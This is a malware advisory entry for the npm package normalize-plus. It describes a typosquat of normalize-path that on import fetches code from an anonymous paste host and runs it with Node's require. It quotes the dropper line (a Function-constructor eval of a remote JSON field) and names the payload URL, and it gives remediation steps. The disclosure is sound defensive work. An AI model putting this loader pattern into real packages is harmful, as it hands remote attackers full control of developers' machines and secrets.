MAL-2026-6399
Dashboard / Malicious Package / MAL-2026-6399
MAL-2026-6399
Summary: Malicious code in normalize-plus (npm)
Details: Source: amazon-inspector (a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675) On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its `cookie` field through the Function constructor: `const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require);` (index.js line 74; URL default at line 65). The `require` symbol is then passed into the dynamically-constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. jsonkeeper.com is a mutable anonymous paste host, so the maintainer can swap the executed code at any time without republishing the package. The package additionally mimics the API of the widely-used `normalize-path` package (exporting a `normalizePath` function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper. Source: ghsa-malware (68736aa001dbb92a66fb97c6f5592b47bd0bafdcb56a325a4c8595f0b10829c7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
References: https://github.com/advisories/GHSA-fr34-v6cp-fc49, https://www.npmjs.com/package/normalize-plus/v/3.6.6
Affected packages
Package
Name: normalize-plus
Purl: pkg:npm/normalize-plus
Affected ranges
Type: SEMVER
Events:
